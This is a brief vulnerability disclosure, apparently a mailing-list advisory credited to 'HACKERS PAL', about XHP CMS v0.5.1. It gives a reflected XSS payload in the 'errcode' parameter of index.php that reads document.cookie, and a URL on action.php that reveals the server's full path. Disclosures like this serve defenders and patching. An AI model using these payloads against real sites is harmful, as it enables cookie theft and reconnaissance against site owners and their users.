XHP CMS v0.5.1 Vuls Xss and Full path vuls

[security@xxxxxxxxx]

Hello,,


XHP CMS v0.5.1 Vuls

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


Xss
index.php?errcode=<script>alert(document.cookie);</script>

Full path
action.php?action=1&module=engine